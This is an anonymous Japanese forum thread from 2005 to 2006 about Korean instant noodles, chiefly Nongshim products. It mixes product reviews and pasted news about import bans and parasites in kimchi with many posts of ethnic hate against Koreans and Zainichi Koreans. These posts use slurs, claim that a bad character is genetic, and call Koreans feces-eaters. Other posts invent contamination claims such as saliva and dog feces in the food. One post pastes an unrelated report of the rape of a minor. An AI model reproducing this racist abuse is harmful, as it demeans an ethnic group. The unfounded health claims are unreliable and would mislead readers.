ヨルムキムチとかの冷たい系もあるしラーメンが広がる前は朝鮮では
一番ポピュラーな麺類だったと聞いた.
冷麺(ネンミョン)はもともと冬限定のものだしね.
煮干(ミョルチ)の出汁がポピュラーになったのは,あきらかにニホンの
植民地時代の影響.
カル」ってのは刃物とかの総称でニホンのソバやウドンと同様,平たく打ったのを
包丁で切るからわざわざ「カルクッス」って云うんじゃないかなぁ...
ちなみに農心の「ミョルチカルクッス」わりとうまい.んじゃ!

256 :すぐ名無し、すごく名無し:2005/06/19(日) 01:31:42 ID:8oTkXKp5
しょせん日本のパクリなのよ。韓国なんて国の食いモンは。由緒ある
きしめんと比べるな、ボケが!!!

257 :すぐ名無し、すごく名無し:2005/06/19(日) 21:11:44 ID:xdZbk0ev
まあ、とりあえずファビョんなよ

258 :すぐ名無し、すごく名無し:2005/06/19(日) 23:24:50 ID:L76yMTTr
>257
逆ファビョんにはスルーでお願いしますよ。

259 :すぐ名無し、すごく名無し:2005/06/20(月) 19:57:36 ID:JsCYdz0p
そろそろ辛スレに統一してもいいのではないか?
と言ってみるテスt

260 :あぼーん:あぼーん
あぼーん

261 :すぐ名無し、すごく名無し:2005/06/21(火) 09:26:24 ID:jyeWIqwF
>>259
うーん…でもあっちはやぱり辛ラー中心だし、
他商品のネタあまりふり過ぎたら結構煙いかも知れないね。
とりあえずまだこのままでもいいんじゃないかな。と言って見る

262 :すぐ名無し、すごく名無し:2005/06/21(火) 19:28:28 ID:ye6DQO86
>>261
そっか。
こっちの話題の中心はどっちかというと辛くない麺みたいだしね。

263 :すぐ名無し、すごく名無し:2005/06/23(木) 12:06:59 ID:P0SqXMWU
質問1 キムチが好きでよく食べるのですが、キムチは怖いのですか。

西山 結論だけ申せば、キムチからいろいろな虫卵が出ているのを見ています。
ここに検疫所に勤務されている共同研究者の石田先生がいらっしゃいますが、正
規ルートで輸入されるキムチについては検疫所で法律の規定に則って何千とある
中から無作為抽出でサンプリングしてチェックして日本に入らないようにしています。
公式には日本に上陸していません。ただ僕の経験から一番問題になると考えられる
のは、韓国に出かけておいしい本場のキムチをお土産で持って帰ってきたものです。
それを食べて病気になったのを聞いています。日本産のキムチは大丈夫ですし、正
規ルートで輸入されるキムチは検疫所がありますから大丈夫ですが、本場のキムチ
をお土産で持ちかえった場合は危ない。

ttp://www.tokyo-eiken.go.jp/inform/seminar/2000/semiyosi.html

輸入のキムチから感染したと思われる回虫症が同一の
飲食店で2例続けて発生し、そこで提供された韓国直送
のキムチから回虫卵を検出できた例やブタの有鈎条虫
卵に汚染されたキムチを食べて脳内に有鈎嚢虫が発見
された報告もあります。

(3)有鈎嚢虫

成虫である有鈎条虫は広く世界に分布し、本症は、主に有鈎条虫卵の付着した食品の摂食により感染し、
各種臓器に有鈎嚢虫の腫瘤を形成する。症状は重篤で、嚢虫が脳、脊髄または眼球に寄生すると痙攣、
意識障害、麻痺、精神障害などを起こすことがある。

近年、輸入キムチが原因として疑われれている報告がある。

【事例】 神奈川県在住、21歳女性。焼き肉が好きでよく食べるが、生肉は食べない。キムチが好きで、韓国産
のキムチ漬けを購入し常食していた。1ヶ月前から感冒様症状があり、左上肢のしびれと右上肢の筋力低下を
感じ来院。頭部CTスキャンでは脳内に計1〜2cmの腫瘤陰影が、血液検査では好酸球の増多が認められた。
このため、寄生虫症を疑って抗体検査を行ったところ有鉤条虫に対する反応が陽性であった。


264 :すぐ名無し、すごく名無し:2005/06/24(金) 02:00:53 ID:Zkbg8G7a
ラーメンを語るスレッドに寄生虫がわいてこまったものだネ。

265 :すぐ名無し、すごく名無し:2005/06/25(土) 18:51:30 ID:ZCaVGP9q
じゃがいも麺は、別にじゃがいもの風味しなかった、
多分、じゃがいもからとったグルテンで麺を作ったと
言う事なんだと思う。
グルテンを入れて、代わりにかん水を使ってないと
言う事なのかも。


266 :すぐ名無し、すごく名無し:2005/06/29(水) 06:52:33 ID:MXBA28pX
日本に星の数だけおいしくて安心な麺製品があるのに、なぜ日本の
デッドコピーの韓国製インスタントを購入するのか理解できん。

ハッ、もしかして在日チョンが集まるスレに迷いこんだ、オレ?

267 :すぐ名無し、すごく名無し:2005/06/29(水) 09:10:57 ID:IqpAA1Yt
>>266
おもしろくねー釣りだな

268 :すぐ名無し、すごく名無し:2005/06/29(水) 20:14:56 ID:yCGIU1iG
英、農心辛ラーメンなど大量輸入禁止

 英国食品基準庁(FSA)が6月15日、辛ラーメン、セウッカン、ジャパゲッティなど
農心(ノンシム)のラーメンおよびスナック類20種に対し、大量輸入および販売禁止処分
を下したことが明らかになった。

 28日、FSAインターネットホームページ(www.foodstandards.gov.uk)によると農心
製品は放射線処理をした原料が含まれているのに、これを包装紙に表示していなかったこと
から輸入、販売禁止処分を受けた。
 FSAは農心のラーメンおよびスナック類20種が放射線処理事実を包装紙に表示するように
した「食品商標規定1996」に違反したとして摘発し「食品警報」(Food Alert)
を発動、農心製品を直輸入している英国の輸入業者(G.COST&Company)が関連
製品を回収していることを明らかにした。

 FSAは放射線処理も認可された施設でなされなかったため、農心製品の英国輸入と販売は
「食品規定1990」に違反しているともしている。
 これに対して農心側は「内需用はもちろん、輸出用製品の原料に放射線処理をせず、スチーム
殺菌処理をしている」とし「放射線処理をしないため、これを表記する理由がない」という立場を
明らかにしている。
 農心関係者は「輸出用カップめんは1個の製品が問題になっただけだと聞いている」とし
「現在、自社で真相調査を行っており、早く真相を把握して調査結果を英国側に伝え輸出を再開
したい」と話している。
 農心は海外在住韓国人市場を中心に、英国には年間10億ウォン(約1億円)分の製品を
輸出している。

中央日報
http://japanese.joins.com/article/article.php?aid=65045&servcode=300§code=300

ほ・・・放射線処理って・・・((((;゚Д゚)))ガクガクブルブル

269 :すぐ名無し、すごく名無し:2005/06/30(木) 00:43:03 ID:kUKCKvu5
韓国ヤクルトのインスタントビビン冷麺を買ってきたけれど、つくりかたがわからねええええ。

270 :すぐ名無し、すごく名無し:2005/06/30(木) 03:00:52 ID:8w8Z+jp4
>>269
危険!すぐ捨てろ。韓国産はこえぇぇぇ〜〜〜

271 :すぐ名無し、すごく名無し:2005/06/30(木) 05:07:39 ID:vCuUexAC
【韓英】英国食品基準庁が辛ラーメンなど農心製品20種に対し大量輸入・販売禁止処分[06/29]
http://news18.2ch.net/test/read.cgi/news4plus/1120014672/l50

272 :すぐ名無し、すごく名無し:2005/06/30(木) 06:41:23 ID:OlHDEiPw
>>265
俺もそうだと思う。
あの麺はかなり良いんだが、他のラーメンでは使わないのかな。

273 :すぐ名無し、すごく名無し:2005/06/30(木) 08:18:18 ID:kUKCKvu5
>>270
お前の頭の方がよほど危険だと思うが。

274 :すぐ名無し、すごく名無し:2005/06/30(木) 10:51:41 ID:pKzp88IQ
>>272
ゴムみたいで不味いよ。


275 :すぐ名無し、すごく名無し:2005/06/30(木) 17:35:03 ID:XuTIyvjb
放射線処理自体はじゃがいもなどで一般的に行われてるわけだが。

276 :すぐ名無し、すごく名無し:2005/07/01(金) 00:23:09 ID:ts8ytql/
>>275
そんな常識も知らない奴ばかりで驚いた。
そういう奴にかぎって汚染された牛肉はありがたがって食べるんだろうな。

277 :すぐ名無し、すごく名無し:2005/07/02(土) 05:05:45 ID:zkwH/YLT
韓国の商品はやばいわな。ダニの卵なんてインスタントラーメン
に混じっていそうだし・・・怖い。

278 :すぐ名無し、すごく名無し:2005/07/02(土) 07:38:16 ID:GTlgckJF
いそうだし

279 :すぐ名無し、すごく名無し:2005/07/02(土) 12:27:47 ID:h0ejrhb1
朝鮮人が喰ってるんだから。


280 :すぐ名無し、すごく名無し:2005/07/03(日) 12:42:23 ID:x7dIm+O/
日本で作ってるからといって清潔とは限らない。

281 :すぐ名無し、すごく名無し:2005/07/03(日) 13:21:07 ID:JDxyFGlg
こんなもん食うのは在日チョンだけだ。

282 :すぐ名無し、すごく名無し:2005/07/03(日) 18:55:15 ID:1ngqcycW
朝鮮人が喰ってるだから。喰っても朝鮮人はピンピンしてる。


283 :すぐ名無し、すごく名無し:2005/07/03(日) 23:32:28 ID:gaiB+Sv1
その代わり性格は破綻してるわな、チョン

284 :すぐ名無し、すごく名無し:2005/07/04(月) 09:41:34 ID:N2xts6b8
あいつらの性格が破綻してるのはDNAに刷り込まれてるから。
物理的に直しようがない。

285 :すぐ名無し、すごく名無し:2005/07/04(月) 20:07:58 ID:OgNqo7RC
ほんたくもくさやもにたようなもんだわな

286 :すぐ名無し、すごく名無し:2005/07/05(火) 02:50:44 ID:vHXagdOm
>>285
韓国のホンタクって韓国農業で今だに肥料として使っている人間の
クソの山に潜り込ませて漬けた珍味でしょ?クサヤとはまったく
違うやん(w

287 :すぐ名無し、すごく名無し:2005/07/05(火) 07:21:40 ID:VX1Hh4yE
糞食民族 チョン
チャンコロも糞食してそうだな

288 :すぐ名無し、すごく名無し:2005/07/05(火) 20:01:02 ID:4r2ofdZd
朝鮮人が喰ってるんだから。全然問題なし。

朝鮮人だよ朝鮮人。


289 :すぐ名無し、すごく名無し:2005/07/06(水) 05:28:17 ID:XCX4JeTB
くさやと同様ごく一部の地方で食されているのみなのに
他国民全体をバカにするのは如何なものか
それにやみつきになるらしいじゃないか
君らも一度試す価値あると思うよ

290 :すぐ名無し、すごく名無し:2005/07/06(水) 19:56:11 ID:NmxXP5M/
放射線のことだよ。

朝鮮人が喰ってるんだもんなあ。
全然問題なし。

291 :すぐ名無し、すごく名無し:2005/07/06(水) 20:23:28 ID:cHmD3StP
韓国農心サイトのCFギャラリー。
CFも秀逸(特に昔の)!
ttp://www.nongshim.com/non/pro/tvcf_deft_lst.jsp

若き日のヨン様も
ttp://s.nongshim.co.kr/non/pro/kensabal94.avi

292 :すぐ名無し、すごく名無し:2005/07/08(金) 04:52:20 ID:+w4umAW7
農心、ドイツでもアウト。

http://japanese.chosun.com/site/data/html_dir/2005/07/07/20050707000029.html
こ汚い韓国人が食品を日本や英国、ドイツ等の先進国に輸出するなんざ
10年早いんだよ!!!!!


293 :すぐ名無し、すごく名無し:2005/07/23(土) 00:25:03 ID:0HHC4ht1
二元中継でいきまっしょい
あげときますね

294 :すぐ名無し、すごく名無し:2005/07/23(土) 01:46:21 ID:3m+M4Whf
    /  ̄ ̄ ̄ ̄ ̄ ⌒ヽ
    /    ID:0HHC4ht1   ヽ
    | | /////.ノ | | | | | |\、|
  | | |-| |〔 =・=.〕--〔=・=〕--ヽ  
  | .|| ||  `ー'(、●^●,)ー'    ヽ
 |  | ||    ノトェェイヽ      l  
 .|  | ||     ヽ`ー'ノ     / 
 i ゝ       '⌒ヽ    ノ  
    \__ '、__,ノ_/|  | ̄ ̄\ \  カタカタカタ・・・
___/        \  |  |    | ̄ ̄|
|:::::::/   \_____ \|  |    |__|
|:::::::| \______|つ⊂|__|__/ /


295 :すぐ名無し、すごく名無し:2005/07/23(土) 01:51:25 ID:049wcR9x
がんがれID:0HHC4ht1!完全に負けてるぞ!

296 :すぐ名無し、すごく名無し:2005/07/23(土) 03:49:49 ID:qmhQrzKQ
袋をあけたら酸っぱい臭いがする朝鮮人が入っていた。

297 :すぐ名無し、すごく名無し:2005/07/23(土) 07:17:33 ID:rzTTwsQ5
近所のスーパーウオロク(新潟)に、ノグリが大量入荷してた!
表パッケージは韓国語だけど、裏は日本版だ。
これで、新潟空港の売店まで買いに行かなくてすむよ。

298 :すぐ名無し、すごく名無し:2005/07/23(土) 23:05:42 ID:q5sEBADs
って結構つまみでは広がっていないんですね。


299 :すぐ名無し、すごく名無し:2005/07/24(日) 09:23:26 ID:2RiPhim5
在日チョンしか食わねぇだろ、こんなもん。

300 :うんちごはん ◆Unchi/NwbU :2005/07/24(日) 10:21:32 ID:cLaPjMvA
ゑゑゑゑゑ?漏れ好きなのに放射線?????

さすがウリナラwますます惚れたぜ!

301 :すぐ名無し、すごく名無し:2005/07/24(日) 12:04:48 ID:xn1Cx8ed
バカが大杉て笑えるw

302 :すぐ名無し、すごく名無し:2005/07/25(月) 06:23:56 ID:21ZbgmJ3
放射線くらい平気だぜ!昔(20年くらい前)は工業用油を使って回収されてたような。
ニーズ(ニックス)ブームのとき、良く買ってたな。

303 :すぐ名無し、すごく名無し:2005/07/27(水) 17:23:56 ID:Fqgw71PC
名前忘れたけど、ちっちゃいのが夜食に最適ですよ^^

304 :すぐ名無し、すごく名無し:2005/07/29(金) 23:55:56 ID:J2T0MP1K
カップのが近所のデパートに大量入荷したんだが、
キムチェと韓国ノリどっちのがオヌヌメ?

因みにカプヌドルキムチェよりは辛らーめん派。
カプヌーはキムチの酸味がなくて・・

305 :すぐ名無し、すごく名無し:2005/07/31(日) 02:13:28 ID:r0OPn/bB
    _  ∩
  ( ゚∀゚)彡 白血病!白血病!
  (  ⊂彡
   |   | 
   し ⌒J

306 :すぐ名無し、すごく名無し:2005/08/01(月) 02:35:18 ID:qJp8/F6j
"中国の7色に輝く河川と食品"
http://blog.livedoor.jp/safe_food_of_asia/archives/50010839.html

307 :すぐ名無し、すごく名無し:2005/08/06(土) 09:22:07 ID:1nhFxec0
夏が終われば落ち着くのかなぁ・・・

308 :すぐ名無し、すごく名無し:2005/08/08(月) 06:12:39 ID:GqxKe17K
さすがに無理だろうな。
8割方の在日と韓国人が論外であっても、
食だけは認めていたんだがきな臭過ぎる。

309 :すぐ名無し、すごく名無し:2005/08/08(月) 11:20:09 ID:+fwu2S52
カルビーのかっぱえびせんもパクッていんだな、このチョン会社。
「農心セウカン」しかもパッケージまでそっくり。
菓子みたいなローテク商品くらい自前で開発しろよ。


310 :すぐ名無し、すごく名無し:2005/08/09(火) 12:00:08 ID:yNVgxP3i
もうすっかり辛スレのほうが総合スレになってしまったな。

311 :すぐ名無し、すごく名無し:2005/08/12(金) 15:35:31 ID:tCFXoKyQ
知れば知るほど嫌いになる歴史捏造韓国
聞けば聞くほど虐殺人数が増える白髪三千畳中国
恵んでやればやるほどせびってくる乞食北朝鮮

312 :あぼーん:あぼーん
あぼーん

313 :すぐ名無し、すごく名無し:2005/08/16(火) 14:05:45 ID:6QQynRSp
今優しい素敵な男性と恋愛がしたいの…
幸福な結婚の夢を見たいな♪

最近出会い系の事件が多くって大変怖くて危険なので即お会いは出来ませんが、
勇気を出して冒険に出ないと心寂しいのでパピコしてみたの…。

314 :すぐ名無し、すごく名無し:2005/08/16(火) 22:23:56 ID:7D4zErUt
かっぱえびせんまでパクっている農心。韓国なんて
人も物も信頼できねぇ。

315 :すぐ名無し、すごく名無し:2005/08/20(土) 05:13:43 ID:DX/kizUR
日本のマンガまでパクッてるしね。
韓国のドラマの元も金妻や昔の日本の昼メロが元です。

316 :すぐ名無し、すごく名無し:2005/08/26(金) 20:33:42 ID:XLuiD2cA
     ((⌒⌒))    そんな本読んじゃダメニダ!!
ファビョ━ l|l l|l ━ン!
(⌒;;..  ∧_,,∧      貴様は右翼に騙されてるニダ!!!
(⌒.⊂,ヽ#`Д´>
(⌒)人ヽ   ヽ、从   お前ら!!ウリの話を聞けニダ!!!
  从ノ.:(,,フ .ノゝ⊃
人从;;;;... レ' ノ;;;从人
   〃∩ ∧_∧
   ⊂⌒(  ・ω・)    はいはいわろすわろす
     `ヽ_っ⌒/⌒c    「嫌韓流は分かりやすいネ」
        ⌒ ⌒
韓国って何で叩かれるの?
何が悪いの?
って人は読んでみよ〜★

317 :すぐ名無し、すごく名無し:2005/08/26(金) 20:44:08 ID:MG3P8wGS
嫌韓流は微妙な所だが解り易いな、
相当に背景やキャラが下手ではあるが。
それでも世界的に見れば日本は中道より
上に行くことはありえないのだが。というか、
農心製品は嫌いじゃないけれどもこのご時世だからな。

318 :すぐ名無し、すごく名無し:2005/08/27(土) 23:04:02 ID:Psy+H/6G
上のほうでも言われてるみたいで今更だけど
農心スレはこっちに統一したらすぃ。

【;`Д´】辛ラーメン 6【からー】
http://food6.2ch.net/test/read.cgi/nissin/1124259299/l50

319 :すぐ名無し、すごく名無し:2005/09/07(水) 18:50:23 ID:LMX25qm2
3)有鈎嚢虫

成虫である有鈎条虫は広く世界に分布し、本症は、主に有鈎条虫卵の付着した食品の摂食により感染し、
各種臓器に有鈎嚢虫の腫瘤を形成する。症状は重篤で、嚢虫が脳、脊髄または眼球に寄生すると痙攣、
意識障害、麻痺、精神障害などを起こすことがある。
近年、輸入キムチが原因として疑われれている報告がある。

【事例】 神奈川県在住、21歳女性。焼き肉が好きでよく食べるが、生肉は食べない。キムチが好きで、韓国産
のキムチ漬けを購入し常食していた。1ヶ月前から感冒様症状があり、左上肢のしびれと右上肢の筋力低下を
感じ来院。頭部CTスキャンでは脳内に計1〜2cmの腫瘤陰影が、血液検査では好酸球の増多が認められた。
このため、寄生虫症を疑って抗体検査を行ったところ有鉤条虫に対する反応が陽性であった。

http://blogimg.goo.ne.jp/user_image/4e/cb/3d0e9f9813131e195a67c1cc7179c8dd.jpg
キムチの寄生虫、有鉤条虫に巣食われた脳

320 :すぐ名無し、すごく名無し:2005/09/20(火) 11:26:12 ID:URsC/+EK
【韓国】ラーメン料理王選抜大会開催 創作ラーメンの腕を競う(09/20)
http://news18.2ch.net/test/read.cgi/news4plus/1127182883/

321 :すぐ名無し、すごく名無し:2005/09/20(火) 14:55:12 ID:1h7x4QF+
酢メシのかわりにラーメンを使った寿司が韓国では流行っている
そうだ。TXのWBSでやってたが、小谷キャスターがおぞましいもの
でも見たかのような顔してたな。

322 :すぐ名無し、すごく名無し:2005/09/21(水) 02:18:41 ID:t752QnFO
農心製品と言えば パクリえびせん

323 :すぐ名無し、すごく名無し:2005/09/21(水) 14:03:40 ID:7Gaml5A/
住民はみんなとっくに移動してるよ。

【;`Д´】辛ラーメン 6【からー】
http://food6.2ch.net/test/read.cgi/nissin/1124259299/l50

324 :すぐ名無し、すごく名無し:2005/09/25(日) 01:01:00 ID:yQw6ZCiG
この会社、衛生面で大丈夫なの?

325 :すぐ名無し、すごく名無し:2005/09/26(月) 11:14:36 ID:GPPCqt+y
>>324
ケンチャナ!

326 :すぐ名無し、すごく名無し:2005/10/12(水) 02:05:55 ID:FewxB5D7
辛、熱、壺など4種類のラーメンをやまやで買ってきましたよ。
しばらく食べてないから味忘れちゃったなぁ。やまやでは一袋88円。
読めない字の奴は4袋で250円くらいだよ。

327 :あぼーん:あぼーん
あぼーん

328 :すぐ名無し、すごく名無し:2005/10/24(月) 22:11:19 ID:86HDNvfh

中国産輸入キムチの中から寄生虫 約18%を中国から輸入している韓国で大騒動に

--------------------------------------------------------------------------------
キムチの本場といえば韓国だが、韓国国内で流通するキムチのおよそ18%が中国から
の輸入品となっている。
この中国産輸入キムチの中から寄生虫の卵が見つかり、韓国で騒動となっている。
中国産のキムチは日本にも輸入されている。
10月21日、韓国政府は、インターネット販売を通じて韓国国内に流通する中国産キムチを
検査したところ、16のうち、9つの商品から寄生虫の卵が検出されたと発表した。
寄生虫が見つかったキムチのメーカーは、ホンフン流通、ブボン、ハナグリーン通商、チャン
ドゥル食品など9つで、見つかった寄生虫は回虫、鉤虫、東洋毛様線虫、戦争イソスポーラの4種類。
これらの寄生虫は人糞(じんぷん)の中にいて、中国では化学肥料の値段が高いため、今でも人糞を
畑にまいて白菜を育てているところが多いという。
また、中国・山東省にあるキムチ工場を撮影した映像には、洗っていない白菜をさびた包丁で切る作業
員が写っていた。また、白菜が入った水槽には、壊れた排水管パイプが一緒に入っていた。
取材した記者によれば、中国のキムチ工場すべてが非衛生的ではなかったものの、一部にはこうした
工場があったという。
寄生虫入りのキムチに騒然とする韓国の薬局では、「虫下し」の薬が飛ぶように売れているという。
一方、日本国内のスーパーでも中国産のキムチが販売されている。
財務省によると、中国から日本へ輸入のキムチは年々増加し、2004年は3万5,000トン余りを輸入した
という。

http://www.fnn-news.com/headlines/CONN00079367.html

329 :すぐ名無し、すごく名無し:2005/10/25(火) 10:21:36 ID:O60HG2+E
185 もぐもぐ名無しさん New! 2005/07/01(金) 17:10:07
【カップ麺から放射能】
英、農心辛ラーメンなど大量輸入禁止

英国食品基準庁(FSA)が6月15日、辛ラーメン、セウッカン、
ジャパゲッティなど農心(ノンシム)のラーメンおよびスナック類
20種に対し、大量輸入および販売禁止処分を下したことが明らか
になった。

<以下ソース参照>

http://japanese.joins.com/article/article.php?aid=65045&servcode=300



330 :すぐ名無し、すごく名無し:2005/10/26(水) 12:36:05 ID:GioqBUin
わりと好き。

331 :すぐ名無し、すごく名無し:2005/10/29(土) 02:53:51 ID:/SjIWNhj
日本のインスタントラーメンが総じて味が落ちてる今、
農心の時代がくるのではないだろうか。
カロリーは大して日本のインスタントラーメンと変わらないのに、量が多い分お得感もあり、
味もウマイときてる。辛いもの好きにもたまらない。作り方も自分の好みに工夫できる。






332 :すぐ名無し、すごく名無し:2005/10/30(日) 20:51:12 ID:1lp10Rh4
うん。納得。あっさりで胃にもたれないしね。

333 :すぐ名無し、すごく名無し:2005/11/06(日) 12:33:33 ID:oq5313sh
【寄生虫キムチ】 今まで検査がなかったのに、いきなり検査するのはおかしい

http://blog.livedoor.jp/mumur/archives/50198156.html

334 :すぐ名無し、すごく名無し:2005/11/07(月) 14:07:53 ID:4MP2lQfB
コムタンラーメンは、スープがくどくなくておいしかった。
日本のインスタントラーメンスープみたいにただただ塩辛かったり
甘かったりということもないけどコクはある感じだった。また買おう。

335 :すぐ名無し、すごく名無し:2005/11/07(月) 23:28:16 ID:XeJGxUQF
「【;`Д´】からー」スレに統一したのでは。

336 :すぐ名無し、すごく名無し:2005/11/09(水) 00:08:35 ID:yDNVUWJ9
331に禿童

337 :すぐ名無し、すごく名無し:2005/12/03(土) 14:10:05 ID:SXvAGrLo


韓国人企業食品

を手放しで称賛する密入国者の子孫である在日韓国人が
必死に陰謀的世論誘導工作活動を計るキチガイスレだな



338 :反日の漫画、ドラマ、映画、歌…韓国のだけ報道しない:2005/12/03(土) 14:28:44 ID:qAymVx8p
阪神淡路大震災の時、韓国で良いニュースです!と世界初『天罰だ!』の号外新聞を出す国。またJR事故では『プライドの脱線』の見出しの新聞。抗議するどころか大喜びでネットでもお祭り状態。同じ反日国でも中国は韓国のように公務員が国旗踏み付けないし、死者を喜ぶ新聞は出してない

339 :すぐ名無し、すごく名無し:2005/12/03(土) 15:27:56 ID:tOMYPOiz
静岡県熱海周辺で農心製品(キムチ焼きそば・ノグリ等々)が充実してるスーパー教えてくらはい(ToT)お願いします!

340 :すぐ名無し、すごく名無し:2005/12/03(土) 16:10:07 ID:SXvAGrLo
↑密入国者の子孫である在日韓国人らしく
本国に帰って放射能汚染された
インスタント麺や
犬肉や糞尿を食らえば?


341 :すぐ名無し、すごく名無し:2005/12/03(土) 22:12:49 ID:Qhlul5sV
美味いよ幸ラーメン美味い。

342 :すぐ名無し、すごく名無し:2005/12/04(日) 01:35:14 ID:7ptc1bvJ
寒酷、品製品の食品は唾入りです。
下手したら犬の大便も混ぜられています。

343 :すぐ名無し、すごく名無し:2005/12/28(水) 00:40:58 ID:8LTIBoKM
農心ファンなのであげる。
最近食ったカムジャ(じゃがいも)麺の感想。
麺:見た目の武骨さに反して舌当たりが滑らかでのど越しが良い。
韓国ラーメンの麺の良さは煮込みに耐え粉っぽくも食べ応えのある
たくましさにあると思っていたが、いい意味で予想が覆された。
汁:できの良い麺に対し主張がはっきりしない味にちょっと疑問。
その他:悪くないが、高価なことを考えるともう一歩か。
>>331
日本のインスタントラーメンは器用さがあだになり高級路線を追求したのが
逆に作用してしまって中途半端になってしまったんだと思う。
結局サッポロ一番等が定番なのはまさに消費者の答えじゃないかな。
韓国ラーメンはチープな食べ物だから、と割り切った方針が感じられるが
だから基本のジャンクな旨さと食べごたえが維持できているんだと思う。
>>334
韓国料理自体牛だしを使うのが得意なだけにそれが活かされてるね。

344 :すぐ名無し、すごく名無し:2005/12/28(水) 02:24:43 ID:6STvNAy5
柔道最高!

345 :すぐ名無し、すごく名無し:2005/12/30(金) 10:34:16 ID:Ppfs0M7A
チャパゲティ(チャジャン麺とスパゲティを組み合わせた商品名)はうまい

346 :すぐ名無し、すごく名無し:2006/01/04(水) 14:56:56 ID:kaKuiILe
同感。チャパゲティは密かに傑作。
どこがスパゲティなのかわかんないけど。
ただ汁がないので一個じゃ量が足りない。

347 :すぐ名無し、すごく名無し:2006/01/05(木) 00:56:47 ID:c3hHQZyg
チャパゲティってネーミングがかわいいな。
でも韓国製のパスタなんて怖くて買わないし、食いたくもない。

348 :すぐ名無し、すごく名無し:2006/01/05(木) 01:22:40 ID:jr0rUtz7
>>346
チャパゲティが好きなら「四川料理チャパゲティ」を試して欲しい。
以前チャパゲティ好きだったが一度たべたらこっちのほうが好きになった。

349 :すぐ名無し、すごく名無し:2006/01/05(木) 22:37:37 ID:gb0sdVUo
>>347
その実全くパスタとは言えない代物。
焼かないインスタント麺の焼きそばという感じ。
>>348
そっちはまだ食べたことない。今度試してみるよ。

350 :すぐ名無し、すごく名無し:2006/01/05(木) 23:34:34 ID:gqZzU028
辛いのは好きだけど、韓国製だから嫌だな。
気持ち悪い。

351 :     ↑:2006/01/06(金) 13:45:36 ID:hwDw5qg9
来なければ良いのに

352 :すぐ名無し、すごく名無し:2006/01/07(土) 01:59:54 ID:C70C/k0o
辛ラーメンのスレ↓
http://food6.2ch.net/test/read.cgi/nissin/1133866985/l50

ここノンシンのラーメンのはなしいっぱいでてるよ。
もちろん四川チャパゲッティも。

353 :すぐ名無し、すごく名無し:2006/01/09(月) 20:16:18 ID:JkuOYMuo
近所のスーパーに行ったら、農心のセウカンとカルビーのかっぱえびせんが
並んで売っていた。
・・・かなりびっくり。ちなみに価格差は10円だった。

354 :すぐ名無し、すごく名無し:2006/01/09(月) 21:20:39 ID:rO/Umqju
カルビーが真似したんだろ?

355 :すぐ名無し、すごく名無し:2006/01/09(月) 21:30:09 ID:rO/Umqju
 つーかカルビって朝鮮語だろ?
カルビーじたいが同系会社だろ?ちがうの?

356 :すぐ名無し、すごく名無し:2006/01/10(火) 03:00:24 ID:g+4ujFb+
辛ラーメンスレに統一したのではなかったかと。

http://food6.2ch.net/test/read.cgi/nissin/1133866985/l50

まあ二つあっても困らないけど、たしか二つの板にまたがってたのが
こっちに移転されてダブったとかで。

357 :すぐ名無し、すごく名無し:2006/01/13(金) 13:43:32 ID:rwBh5yUl
ノグリの大胆な昆布に驚いた。
こういう大雑把な発想が韓国らしい。
太い麺とスープのバランスがよく傑作だと思う。
辛ラーメンよりこのノグリやチャパゲティのが好きなのに
安くなった辛ラーメンと違って高止まりなのが残念。

358 :すぐ名無し、すごく名無し:2006/01/15(日) 13:53:43 ID:fM4HuEJa
チゲ麺はソーセージの味が強くまさに部隊チゲ。

359 :すぐ名無し、すごく名無し:2006/02/22(水) 06:41:35 ID:Jstc7QsX
捕手

360 :すぐ名無し、すごく名無し:2006/02/26(日) 22:31:45 ID:KRgbbXI5
このSSに見覚えのある方はいらっしゃいませんか
ttp://vista.x0.to/img/vi4096065425.jpg
悪質なコンピューターウイルスに感染しています

361 :すぐ名無し、すごく名無し:2006/02/26(日) 23:51:27 ID:8W3Vdw70
>>360のURLはクリックしないように。

362 :すぐ名無し、すごく名無し:2006/02/27(月) 00:45:19 ID:8lzQrkP2
>>361
開いても問題ないだろ、何言ってんだ?

363 :すぐ名無し、すごく名無し:2006/03/02(木) 17:58:35 ID:6Bj1Bns9
韓国のインスタント麺に「ミソラミョン」と発音するものがあるのですが、
この場合の「ミソ」は微笑の「ミソ」のことでしょうか?
「微笑みらーめん」という製品名なのですか?


364 :すぐ名無し、すごく名無し:2006/03/11(土) 23:29:48 ID:WLbu85pC
チゲラーメンのスレです?
辛ラーメンより辛いですね。
麺がモチモチしてて、結構おいしいです。

365 :すぐ名無し、すごく名無し:2006/03/12(日) 01:01:27 ID:tspiuk4h
こっちまだ続いてたんだ。乙です。

366 :すぐ名無し、すごく名無し:2006/03/12(日) 01:38:07 ID:vH7Rtms+
朝鮮民族まんせー
まんせー まんせー





367 :すぐ名無し、すごく名無し:2006/03/12(日) 09:47:32 ID:EjTfMXxI
【韓国】女子高生、ラブホテルで強姦→セクハラ→強姦→強姦に遭う
1 名前:犇@犇φ ★ 投稿日:2006/03/03(金) 08:23:09 ID:???
インターネットチャットで会った20代に強姦された10代女子高生が、この
事実を訴えた大人たちに相次いで強姦され、衝撃を与えている。
3日、女子高生Aさん(16)は今年1月中旬、チャットで知り合った李某氏
(25)から映画を一緒に見ようと誘い出されて、ラブホテルで強姦された。
強姦被害後、妊娠を心配したAさんは薬局に避妊薬を買いに行った。
だが、薬局従業員の朴某氏(28)の言葉に騙され、避妊薬を挿入するふりをする朴氏からセクハラにあった。
Aさんはまた2月10日、チャットで知り合った金某氏(25)に被害を打ち明けたところ、金氏と
一緒に酒を飲んだ際に金氏から強姦されて携帯電話と財布まで奪われた。
その直後、Aさんはタクシーに乗って警察に届出に行く途中、タクシー運転手の鄭某氏(35)に
被害事実を打ち明けたところ、鄭氏から再び強姦された。
http://www.yonhapnews.co.kr/news/20060303/030000000020060303074705K1.html(ハングル)



368 :すぐ名無し、すごく名無し:2006/03/14(火) 02:48:33 ID:dp8CHWUb
>>365
オツというよりも
統合&誘導してるんだからホシュせず沈めるべきじゃないかと。
あんま言うと自治厨になってしまうのだが、一応誘導

辛ラーメンスレ(他のノウシンのラーメンもおkらしい)
http://food6.2ch.net/test/read.cgi/nissin/1133866985/l50

369 :すぐ名無し、すごく名無し:2006/04/06(木) 22:18:18 ID:RpBiYdOQ
チゲラーメン食ったが、まさに缶詰の両切りソーセージを
煮込んだようなスモーキーフレーバーが効いている。
ちゃんと部隊チゲ風になっててうまかったぞ。

370 :すぐ名無し、すごく名無し:2006/04/14(金) 02:31:24 ID:nwEQeygD
アイルランドで販売禁止になったんだっけ?
麺に放射能浴びせているとかなんとかの理由で。

371 :すぐ名無し、すごく名無し:2006/04/14(金) 15:06:04 ID:DdqwfDuG
>>369
